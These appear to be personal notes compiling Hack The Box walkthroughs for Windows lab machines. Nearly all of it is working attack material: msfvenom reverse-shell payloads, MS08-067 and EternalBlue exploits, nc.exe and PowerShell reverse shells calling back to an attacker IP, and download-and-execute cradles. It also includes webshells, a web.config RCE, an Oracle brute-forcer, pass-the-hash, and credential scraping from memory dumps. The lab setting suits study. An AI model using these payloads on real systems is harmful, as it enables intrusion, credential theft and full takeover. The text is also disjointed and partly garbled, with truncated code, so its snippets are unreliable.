My Practice on HTB Windows boxes

Windows

htb

https://0xdarkvortex.dev/index.php/2018/04/17/31-days-of-oscp-experience/

legacy: windows

One method:

nmap -sT -p- --min-rate 10000 -oA nmap/alltcp 10.10.10.4

SMB smbmap -H 10.10.10.4 nmap vuln scanner for smb nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4

smb-vuln-ms08-067: vulnerable

SMB exploits, MS-08-067 (made famous by Conficker) and MS-17-010 (made famous by Shadow Brokers).

MS-08-067

https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

for changing the shellcode msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

python ms08-067.py 10.10.10.4 6 445

MS-17-010 https://github.com/worawit/MS17-010

wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe

python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe

transfer whoami.exe binary from kali to windows xp

smbserver.py a /usr/share/windows-binaries/

C:\WINDOWS\system32>\10.10.14.14\a\whoami.exe

==========================================================

blue writeup - windows

nmap nmap -A -vv --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-ms17-010 -p445 10.10.10.40

services open smb

smbmap -u guest -H ip

its vulnerable to eternal blue vulnerability cve-2017-0143

1st method

Using the windows/smb/ms17_101_eternalblue module in Metasploit, we can successfully get a shell as nt authority!

https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py - mysmb script put on the same folder

vi /etc/hosts smbclient -L \10.10.10.40 -N smbclient \\haris-pc\Users

smbclient -L \haris-pc -N - smbscan smb verification- smbclient \\haris-pc\Users

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=port -f exe > blue.exe

exploit modifiation - username - guest and changes the exploit

smb_send file exploit

smbfile smbexec

python exploit.py ip ntsvcs - boom

more root.txt

further exploitation - enable rdp and add a user

net user hacker hacker /add net localgroup /add administrators hacker

enabling rdp reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

3389 enabled

=============================================

htb windows

devel - windows

nmap -sT -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.5

found ftp open 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM aspnet_client | 03-17-17 04:37PM 689 iisstart.htm |_03-17-17 04:37PM 184946 welcome.png

server is running on asp.net. we can upload asp shell and get the reverse connection

Shell as web https://github.com/danielmiessler/SecLists asp shell upload

locate cmd.aspx usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx

put cmd.aspx then visit cmd.aspx

web to shell- 3 ways (nc.exe, nishang, meterpreter)

1 way nc.exe

create a smb server on attackeer machine and upload nc.exe on the server

locate nc.exe cp /usr/share/windows-binaries/nc.exe smb/

run this command on attacker machine smbserver.py share smb

create a listener on the attacker machine

\10.10.14.14\share\nc.exe -e cmd.exe 10.10.14.14 443 - in webshell run this command

2nd way

nishang exploit

git clone https://github.com/samratashok/nishang.git

Invoke-PowershellTcp copy this file from /opt/nishang/shells to /smb directory

this line put in to end of the file Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443

This will make it so that not only does the module load, but then the shell is called to give me a callback.

run this commmand on the webshell then it get from attacker python server and then give shell to attacker machine powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/Invoke-PowerShellTcp.ps1')

3rd way: meterpreter shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met_rev_443.aspx

put met_rev_443.aspx

then run listener on metasploit and get the system shell by clicking aspx shell

curl http://10.10.10.5/met_rev_443.aspx

Privesc: web –> System

Enumeration part systeminfo

1st way

WATSON to check potential vulnerabilities

For checking .net version: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

https://github.com/rasta-mouse/Watson

\10.10.14.14\share\Watson.exe

https://github.com/abatchy17/WindowsExploits

\10.10.14.14\share\MS11-046.exe

done boom

2nd method with metasploit

MS10-015

Run local exploit suggester : use post/multi/recon/local_exploit_suggester

I’ll give exploit/windows/local/ms10_015_kitrap0d a run.

==============================================================================

optimum htb windows

nmap -sC -sV -oA optimum 10.10.10.8 https://old.exploit-db.com/exploits/39161/ https://www.exploit-db.com/exploits/39161

script value change (add ip and port)

cp /usr/share/windows-binaries/nc.exe /opt/HTB/optimum

copy window binary from kali to windows with exploit

we got user shell

now turn to root shell windows-exploit-suggester.py

python windows-exploit-suggester.py –update

python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls

we use powershell empire for exploit ms16-032 Under PowerShell/Empire, there is a separate ps1 file for MS16-032. We will save it as Empire.ps1.

Invoke-MS16032 -Command “iex(New-Object Net.WebClient).DownloadString(‘http://10.10.14.2/shell.ps1‘)”

2nd method

searchsploit hfs 2.3

rce on the system copy nc in to specific folder and exploit through python script

after got user access then turn in to window exploit suggester

python window exploitsuggester.py --database .xls --systeminfo .txt

While this tool gave us some great suggestions, i found an easier exploit while looking around on Google.

ms16-098

powershell -ExecutionPolicy Bypass -File wget.ps1 http://ip/41020.exe 41020.exe

https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS16-098/bfill.exe

==================================================================

Bastard htb windows

nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.9

I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7.

IIS check with os : https://en.wikipedia.org/wiki/Internet_Information_Services

check the drupal version through changelog.txt curl -s http://10.10.10.9/CHANGELOG.txt | head

run droopescan for finding potential loopholes

/opt/droopescan/droopescan scan drupal -u http://10.10.10.9

Shell as iusr

searchsploit -m exploits/php/webapps/41564.php

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9/ -e php -x 403,404 -t 50

curl http://10.10.10.9/rest

$url = 'http://10.10.10.9'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint';

$file = [ 'filename' => '0xdf.php', 'data' => '<?php system($_REQUEST["cmd"]); ?>' ];

apt install php-curl

hashcat -m 7900 admin.hash /usr/share/wordlists/rockyou.txt -o admin.cracked --force

http://10.10.10.9/0xdf.php?cmd=\\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443

Drupalgeddon2

Ruby Script However, on reading about Drupalgeddon2, it seems this is testing the vulnerability on a Drupal 8 specific path.

I’ll try the ruby script, searchsploit -m exploits/php/webapps/44449.rb. Now I’ll run it, and it returns the help, and a warning:

dos2unix

ruby 44449.rb http://10.10.10.9/

Settings - Proxy information (nil to disable)

proxy_addr = '127.0.0.1' proxy_port = 8080

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443

2nd method through nishang

python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')"

https://raw.githubusercontent.com/oways/SA-CORE-2018-004/master/drupalgeddon3.py

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/51x/WHP

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip - ms15-051

with smbserver transfer this \10.10.14.14\share\ms15-051x64.exe "whoami"

\10.10.14.14\share\ms15-051x64.exe "\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443"

======================================================

Silo htb walkthrough

nmap -sC -sV -oA nmap/initial 10.10.10.82

odat sidguesser -s 10.10.10.82

guess bruteforce user and password

sqlplus SCOTT/tiger@10.10.10.82:1521/XE

sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba

odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba

odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)

odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx

cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 .

powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:8083/Invoke-PowerShellTcp.ps1')

Privesc

type "\users\Phineas\Desktop\Oracle issue.txt"

Memdump

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

volatility kdbgscan -f SILO-20180105-221806.dmp

https://github.com/volatilityfoundation/volatility/wiki/Command-Reference

volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist

volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000

Root shell

/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82

Alternative Path to root

Oracle Execution

tasklist /v

odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\users\administrator\desktop\root.txt

Shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe

upload the file odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \temp shell.exe shell.exe

run the file odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \temp shell.exe

RottenPotato Privesc

If we check whoami /priv, we’ll see SeImpersonatePrivilege:

whoami /priv

https://github.com/decoder-it/lonelypotato

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"

PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat') PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')

=======================================

blog 2

Notice that port 80 - Microsoft IIS httpd 8.5 is opened. Just note it down, it will be useful later on. Let’s focus on port 1521 (and sort of port 49160) instead - Oracle TNS listener 11.2.0.2.0 (unauthorized). Doing some enumeration I find out that this particular version of Oracle listener is vulnerable to remote TNS poisoning.

Exploitation Creating your own privileged users

sqlplus scott/tiger@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=10.10.10.82)(Port=1521))(CONNECT_DATA=(SID=XE))) AS SYSDBA CREATE USER v3ded IDENTIFIED BY v3ded99; GRANT dba TO v3ded;

ODAT python odat.py all -s 10.10.10.82 -d XE -U v3ded -P v3ded99

[2.10] DBMS_XSLPROCESSOR library ? is enabled

DBMS_XSLPROCESSOR library is enabled and therefore allows us to put any files onto the machine. Here is the command that will do so:

python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U v3ded -P v3ded99 --putFile "c:\Windows\" "v3ded.txt" "/tmp/v3ded.txt"

now create the shell msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.15.193 LPORT=443 -f aspx > /tmp/v3dedShell.aspx

python odat.py dbmsxslprocessor -s ip -d XE -U v3dwd -P pass --putfile "C:\inetpub\wwwroot\" "v3dedshell.aspx" "/tmp/v3dedshell.aspx"

after getting shell Navigating to his Desktop directory I see an interesting file called “Oracle issues.txt”.

Using Volatility to extract passwords

https://github.com/volatilityfoundation/volatility python vol.py -f SILO-20180105-221806.dmp imageinfo

python vol.py -f ../SILO-2018.dmp --profile=Win8SP1x64 hivelist

python vol.py -f SILO-20180105-221806.dmp --profile=Win8SP1x64_18340 hivelist

==========================================

3rd blog silo

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba

we create a new file name is 1.bat and the content is

dir /a c:\users\

./odat.py

./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" 1.bat /root/Desktop/1.bat --sysdba

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" 1.bat --sysdba

=================================================

1st blog 0xdf

nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.82

gobuster -u http://10.10.10.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html -t 30 - for dir hunting

Oracle db - Port 1521 - port open we need odat tool setup now find sid 1 - Identify SIDs

odat sidguesser -s 10.10.10.82 - sidguesser

[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE' [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc' [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc' So at this point we have four potential SIDs: ‘XE’, ‘XEXDB’, ‘PLSExtProc’, and ‘CLRExtProc’.

3 - Guess / bruteforce user and pass

So I wrote a brute force script in python, using threads, can go pretty quick:

!/usr/bin/env python

import cx_Oracle import sys from multiprocessing import Pool

MAX_PROC = 50 host = "10.10.10.82" sid = "XE"

def usage(): print("{} [ip] [wordlist]".format(sys.argv[0])) print(" wordlist should be of the format [username]:[password]") sys.exit(1)

def scan(userpass): u, p = userpass.split(':')[:2] try: conn = cxOracle.connect('{user}/{pass}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid)) return u, p, True except cx_Oracle.DatabaseError: return u, p, False

def main(host, userpassfile, nprocs=MAX_PROC): with open(userpassfile, 'r') as f: userpass = f.read().rstrip().replace('\r','').split('\n')

pool = Pool(processes=nprocs)
for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]):
if status:
print("Found {} / {}\n\n".format(username, pass_))
else:
sys.stdout.write("\r {}/{} ".format(username, pass_))

if name == 'main': if len(sys.argv) != 3: usage() main(sys.argv[1], sys.argv[2])

4 - Check out the database sqlplus SCOTT/tiger@10.10.10.82:1521/XE

5 - db PrivEsc

select * from user_role_privs; sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba Similarly with odat, running the all scan shows nothing that can be done, but passing in the --sysdba flag changes all of that:

odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba

odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)

odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx

User Shell

Nishang powershell

cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 .

Use SimpleHTTPServer to offer it, and then issue the following to the webshell: powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:8083/Invoke-PowerShellTcp.ps1')

user.txt

Privesc Desktop Note

type "\users\Phineas\Desktop\Oracle issue.txt"

we got memory dump Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password: ?%Hm8646uC$

we need memory dump for this file and get data systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600

volatility kdbgscan -f SILO-20180105-221806.dmp Profile suggestion (KDBGHeader): Win2012R2x64_18340

volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist 0xffffc00000028000 0xffffc00000619000

volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000

hashes got

try passthehash /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82

2 Alternative Path to root

Oracle Execution tasklist /v

odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\users\administrator\desktop\root.txt

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe

Now upload it:

odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \temp shell.exe shell.exe

And run it:

odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \temp shell.exe

3 RottenPotato Privesc whoami /priv

SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled

This means that we can likely use RottenPotato (or LonelyPotato).

First, we’ll upload two files to the server. MSFRottenPotato.exe and rev.bat. The exe is from Decoder’s GitHub page for lonelypotato. The second is a simple powershell command to get a shell:

https://github.com/decoder-it https://github.com/decoder-it/lonelypotato/tree/master/RottenPotatoEXE

rev.bat powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"

So, from our low priv shell, grab the files:

PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat') PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')

run this file c:\temp\lp.exe * \temp\rev.bat

https://decoder.cloud/2017/12/23/the-lonely-potato/ https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://github.com/decoder-it/lonelypotato

======================================================

bounty htb windows

Bounty was one of the easier boxes I’ve done on HTB, but it still showcased a neat trick for initial access that involved embedding ASP code in a web.config file that wasn’t subject to file extension filtering. Initial shell provides access as an unprivileged user on a relatively unpatched host, vulnerable to several kernel exploits, as well as a token privilege attack. I’ll show a handful of ways to enumerate and to escalate privilege, including a really neat new tool, Watson. When I first wrote this post, Watson wouldn’t run on Bounty, but thanks to some quick work from Rasta Mouse and Mark S, I was able to update the post to include it.

nmap -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.93 80 port open

Server Identification : ASP.net

gobuster

gobuster -u http://10.10.10.93 -w usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx

transfer.aspx / UploadedFiles

/transfer.aspx presents a simple form with “Browse…” and “Upload” buttons:

Bypassing Upload Extension Filter I’ll grab a copy of the aspx shell that comes with kali, and try to upload it. On first attempt to upload, the page rejects it:

I can bypass the filter by adding a null byte after our aspx so that the app thinks it’s a jpg, but then saves it as an aspx:

.aspx%00.jpg

Getting Execution Still, when I then view http://10.10.10.93/UploadedFiles/cmdasp.aspx, it returns an error:

web.config RCE

Shell as merlin

Prep It’s certainly possible to get a webshell, but I’ll notice that the UploadedFiles path is being cleared out every few minutes. So I’ll opt to go directly to reverse shell. First, grab a copy of Nishang’s Invoke-PowerShellTcp.ps1. Then add a line at the end to invoke a callback to me:

Web.config file

<?xml version="1.0" encoding="UTF-8"?>

</handlers>

</fileExtensions>

</hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')") %>

Execution Now, I take two steps:

Upload the web.config using the web form

Visit http://10.10.10.93/UploadedFiles/web.config, which runs the asp code, which invokes PowerShell to download the Nishang shell, and then run it creating a connection back to me:

user.txt

Now with shell, I can grab user.txt. Strangely, it’s not present when I look for it: It turns out that the file is there, it’s just hidden.

If I re-run Get-ChildItem (or gci or ls) with the -Force flag, it shows up:

gci -force

Privesc: merlin –> SYSTEM Enumeration

I’ve got a bunch of different methods here, but if you’re only going to read on, jump ahead to Watson, as it’s brand new, and my favorite.

System Info systeminfo Whoami /priv

Whenever I get access via a web service on a Windows host, I always check whoami /priv. If SeImpersonatePrivilege is present,

I can likely get SYSTEM with Lonely Potato. That appears to be the case here: SeImpersonatePrivilege Impersonate a client after authentication Enabled whoami /priv

Sherlock Another tool to try is Sherlock. Unfortunately, it’s no longer being maintained, in favor of Watson (see more on that later).

Still, it’s a quick PowerShell Script that will identify some kernel exploits. Upload it, and then run

Find-AllVulns.

It looks like MS10-092 is a good candidate:

Watson : check the version details:

\windows\microsoft.net\framework\v2.0.50727\msbuild -version So build again with .NET Framework 2.0, copy it over to Bounty, and run it: 2.0 version create a watson.exe and run it into the machine

https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/

[*] Appears vulnerable to MS10-092 [>]

Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges

. [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb [>] Notes: None.

Metasploit msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=445 -f psh -o www/met-445.ps1

use post/multi/recon/local_exploit_suggester Now get and run PowerShell launcher from my Nishang shell: iex(new-object net.webclient).downloadstring('http://10.10.14.5/met-445.ps1')

Escalation Method 1: Lonely Potato

https://github.com/decoder-it/lonelypotato/blob/master/RottenPotatoEXE/MSFRottenPotato.exe

(new-object net.webclient).downloadfile('http://10.10.14.5/lonelypotato.exe', 'C:\users\merlin\appdata\local\temp\lp.exe')

(new-object net.webclient).downloadfile('http://10.10.14.5/rev.bat', 'C:\users\merlin\appdata\local\temp\rev.bat')

(new-object net.webclient).downloadfile('http://10.10.14.5/lonelypotato.exe', 'C:\users\merlin\appdata\local\temp\lp.exe')

in rev.bat : powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1') run it and get a shell

C:\users\merlin\appdata\local\temp\lp.exe * C:\users\merlin\appdata\local\temp\rev.bat Escalation

Method 2: Kernel Exploits - Metasploit msf exploit(windows/local/ms10_092_schelevator) > options

====================================== 2 blog:

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp

<% Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject("WScript.Shell") Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %>

</FORM>

<%= "\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <%Response.Write(Request.ServerVariables("server_name"))%>

The server's port:

The server's software:

The server's software:

msfvenom: Payload generator & encoder. -p windows/x64/meterpreter/reverse_tcp: Sets the payload as a x64 meterpreter reverse shell. LHOST=10.10.14.251: Sets the “listening” host to our own IP. LPORT=4321: Sets the “listening” port to a port of our choice. -f exe: Sets the payload output format as an exe. -a x64: Specifies the system architecture as x64. -o payload.exe: Sets our output payload name to be “payload.exe”. — platform windows: Specifies the victim’s platform as windows (not necessary), as this is automatically inferred from the payload AFAIK).

ren c:\inetpub\wwwroot\UploadedFiles\payload.exe.config payload.exe c:\inetpub\wwwroot\UploadedFiles\payload.exe

PART TWO: ROOT

use exploit/windows/local/ms10_092_schelevator

=====================================

blog 3

<?xml version="1.0" encoding="UTF-8"?>

</system.webServer> <% Set s = CreateObject("WScript.Shell") Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2:80/ex.ps1')") o = cmd.StdOut.Readall() Response.write(o) %>

https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

Once the malware is generated, we can use a tool built into the majority of Windows machines called certutil. The command I use to do this is:

certutil -urlcache -f http://10.10.14.2/1.exe 1.exe

==============================================================

heist htb 2 jan

first blog

nmap -sV -sT -sC -o nmapinitial heist.htb nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.149

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 80 135 445

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 Cisco Type 5 salted md5

username rout3r password 7 0242114B0E143F015F5D1E161713

username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Type 5 john --wordlist=/usr/share/wordlists/rockyou.txt level5_hash

Python script to crack cisco 7 password

!/usr/bin/env python3
import sys from binascii import unhexlify
if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} [level 7 hash]") exit()
static_key = "tfd;kfoA,.iyewrkldJKD" enc = sys.argv[1] start = int(enc[:2], 16) - 1 enc = unhexlify(enc[2:]) key = static_key[start:] + static_key[:start]
plain = ''.join([chr(x ^ ord(key[i % len(key)])) for i, x in enumerate(enc)]) print(plain)

list of passwords and usersnames: root@kali# cat passwords stealth1agent $uperP@ssword Q4)sJu\Y8qz*A3?d root@kali# cat users rout3r admin hazard

SMB - TCP 445

smbmap -H 10.10.10.149 - not working access denied

With Creds

crackmapexec smb 10.10.10.149 -u users -p passwords

CME 10.10.10.149:445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent (This is working)

I’ll re-run smbmap with creds. hazard can only access IPC$:

smbmap -H 10.10.10.149 -u hazard -p stealth1agent

ADMIN$ NO ACCESS C$ NO ACCESS IPC$ READ ONLY

As I can read IPC$, I can connect with rpcclient:

rpcclient -U 'hazard%stealth1agent' 10.10.10.149

I can use the lookupnames command to get the SIDs of the users I know:

lookupnames hazard lookupnames administrator

lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008

rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c 'lookupsids S-1-5-21-4254423774-1266059056-3197185112-1000'

manual enumerate users for i in {1000..1050}; do rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done

automated tool : lookupsid.py hazard:stealth1agent@10.10.10.149

Shell as chase ruby /opt/evil-winrm/evil-winrm.rb -i 10.10.10.149 -u SUPPORTDESK\chase -s ~/pshs/ -p 'Q4)sJu\Y8qz*A3?d'

Alternatively, I could create the same dump using PowerSploit’s Out-Minidump:

grep -aoE 'login_username=.{1,20}@.{1,20}&login_password=.{1,50}&login=' firefox.exe_190823_025430.dmp

The options on grep are:

-a - Process a binary file as if it were text. -o - Print only the matched (non-empty) parts of a matching line -E - Interpret PATTERNS as extended regular expressions

2nd blog cisco type 7 http://ibeast.com/tools/CiscoPassword

cisco type 5 hashcat -m 500 pass.txt /usr/share/wordlists/rockyou.txt --force --outfile output.txt

impacket tool for bruteforce users

python lookupsid.py Hazard:stealth1agent@10.10.10.149

https://github.com/Hackplayers/evil-winrm - winrm testing tool

Need to create ps1_scripts and exe_files

evil-winrm -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d' -s './ps1_scripts/' -e './exe_files/' whoami cd .. cd Desktop cat user.txt

Privilege Escalation cd appdata\Roaming\Mozilla\firefox - firefox is running

upload /var/www/html/procdump64.exe - upload procdump to dump all processes ps

./procdump64.exe -ma 7024

Firefox.exe_191291_111009.dmp | Select-String "username="

evil-winrm -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ' -s './ps1_scripts/' -e './exe_files/' whoami cd .. cd Desktop cat root.txt

3rd blog

Type 7 password http://www.ifm.net.nz/cookbooks/passwordcracker.html

Enumerating Users –> Shell as Chase –> User Flag So far we have hazard and rout3r as potential usernames and stealth1agent, $uperP@ssword, Q4)sJu\Y8qz*A3?d as potential passwords.

smbclient --list //heist.htb/ -U 'hazard'

impacket to enumerate other users /opt/impacket/examples/lookupsid.py hazard:stealth1agent@heist.htb

Then I could authenticate to winrm as chase : Q4)sJu\Y8qz*A3?d:

evil-winrm -i heist.htb -u chase -p password -s './ps1_scripts' -e './exe_files'

Administrator Password from Firefox Process Dump –> Shell as Administrator –> Root Flag

Then I uploaded strings.exe and used it on the dump and saved the output to another file:

upload strings64.exe

cmd /c "strings64.exe -accepteula firefox.exe_191129_211531.dmp > firefox.exe_191129_211531.txt"

findstr "password" ./firefox.exe_191129_211531.txt

===================================================================

Jeeves htb windows without metasploit

nmap -T4 -sC -sV -n 10.10.10.63 -oA jeeves_initial_scan

Enumerating Port 50000 (Jetty/Jenkins)

Whenever I encounter an application that error message that looks fairly unique, I always copy & paste the error message into Google and see what happens. This technique is very underrated, google that shit.

Powered by Jetty 9.4

